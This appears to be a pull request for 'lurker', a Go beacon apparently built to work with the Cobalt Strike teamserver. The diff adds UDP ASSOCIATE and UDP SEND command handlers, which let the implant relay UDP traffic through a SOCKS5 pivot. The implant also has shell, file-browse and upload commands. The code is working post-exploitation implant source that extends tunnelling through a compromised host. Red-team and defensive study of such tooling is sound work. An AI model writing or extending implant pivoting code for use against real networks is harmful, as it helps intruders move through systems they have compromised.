### PR TITLE
UDP support - SOCKS5

### DIFF
--- a/lurker/commands/commands.go
+++ b/lurker/commands/commands.go
@@ -28,6 +28,8 @@ const (
 	CMD_TYPE_FILE_BROWSE  = 53
 	CMD_TYPE_UPLOAD_LOOP  = 67
 	CMD_TYPE_SHELL        = 78
+	CMD_TYPE_UDP_ASSOCIATE = 103
+	CMD_TYPE_UDP_SEND      = 104
 )
 
 // Callback type constants (agent → teamserver)

--- a/lurker/pivot/pivot.go
+++ b/lurker/pivot/pivot.go
@@ -24,6 +24,7 @@ type conn struct {
 	id       uint32
 	conn     net.Conn
 	listener net.Listener
+	udpConn  net.PacketConn
 }
 
 var (
@@ -102,6 +103,39 @@ func Send(socketID uint32, data []byte) {
 	c.SetWriteDeadline(time.Time{})
 }
 
+func UDPAssociate(socketID uint32) {
+	pc, err := net.ListenPacket("udp", ":0")
+	if err != nil {
+		events <- Event{Type: EventClose, SocketID: socketID}
+		return
+	}
+	entry := &conn{id: socketID, udpConn: pc}
+	mu.Lock()
+	conns[socketID] = entry
+	mu.Unlock()
+	events <- Event{Type: EventConnect, SocketID: socketID}
+	go udpReadLoop(entry)
+}
+
+func UDPSend(socketID uint32, host string, port uint16, data []byte) {
+	mu.Lock()
+	entry, ok := conns[socketID]
+	if !ok || entry.udpConn == nil {
+		mu.Unlock()
+		return
+	}
+	pc := entry.udpConn
+	mu.Unlock()
+
+	addr, err := net.ResolveUDPAddr("udp", net.JoinHostPort(host, fmt.Sprintf("%d", port)))
+	if err != nil {
+		return
+	}
+	pc.SetWriteDeadline(time.Now().Add(5 * time.Second))
+	pc.WriteTo(data, addr)
+	pc.SetWriteDeadline(time.Time{})
+}
+
 func Close(socketID uint32) {
 	mu.Lock()
 	entry, ok := conns[socketID]
@@ -115,6 +149,9 @@ func Close(socketID uint32) {
 		}
 		if entry.conn != nil {
 			entry.conn.Close()
+		}
+		if entry.udpConn != nil {
+			entry.udpConn.Close()
 		}
 	}
 }
@@ -150,6 +187,32 @@ func readLoop(entry *conn) {
 			mu.Unlock()
 			if stillActive {
 				entry.conn.Close()
+			}
+			return
+		}
+	}
+}
+
+func udpReadLoop(entry *conn) {
+	buf := make([]byte, 65535)
+	for {
+		entry.udpConn.SetReadDeadline(time.Now().Add(120 * time.Second))
+		n, _, err := entry.udpConn.ReadFrom(buf)
+		if n > 0 {
+			data := make([]byte, 4+n)
+			binary.BigEndian.PutUint32(data[:4], entry.id)
+			copy(data[4:], buf[:n])
+			events <- Event{Type: EventRead, SocketID: entry.id, Data: data}
+		}
+		if err != nil {
+			mu.Lock()
+			_, stillActive := conns[entry.id]
+			if stillActive {
+				delete(conns, entry.id)
+			}
+			mu.Unlock()
+			if stillActive {
+				entry.udpConn.Close()
 			}
 			return
 		}

--- a/main.go
+++ b/main.go
@@ -285,6 +285,28 @@ func executeCommand(cmdType uint32, cmdBuf []byte, taskID [8]byte) {
 		socketID := binary.BigEndian.Uint32(cmdBuf[:4])
 		pivot.Close(socketID)
 
+	case commands.CMD_TYPE_UDP_ASSOCIATE:
+		if len(cmdBuf) < 6 {
+			return
+		}
+		// socketID(4) + port(2) + host (ignored — beacon just opens a local UDP socket)
+		socketID := binary.BigEndian.Uint32(cmdBuf[:4])
+		pivot.UDPAssociate(socketID)
+
+	case commands.CMD_TYPE_UDP_SEND:
+		if len(cmdBuf) < 10 {
+			return
+		}
+		socketID := binary.BigEndian.Uint32(cmdBuf[:4])
+		destPort := binary.BigEndian.Uint16(cmdBuf[4:6])
+		addrLen := binary.BigEndian.Uint32(cmdBuf[6:10])
+		if uint32(len(cmdBuf)) < 10+addrLen {
+			return
+		}
+		host := string(cmdBuf[10 : 10+addrLen])
+		payload := cmdBuf[10+addrLen:]
+		pivot.UDPSend(socketID, host, destPort, payload)
+
 	case commands.CMD_TYPE_LISTEN:
 		if len(cmdBuf) < 6 {
 			return


### PR DESCRIPTION
- Added UDP support for SOCKS5. Cobalt Strike only officially supports this to IPV4 destinations.
- The Lurker implementation is technically IPV4/IPV6 agnostic - so it should work for UDP to IPV6 destinations through the SOCKS5 proxy in theory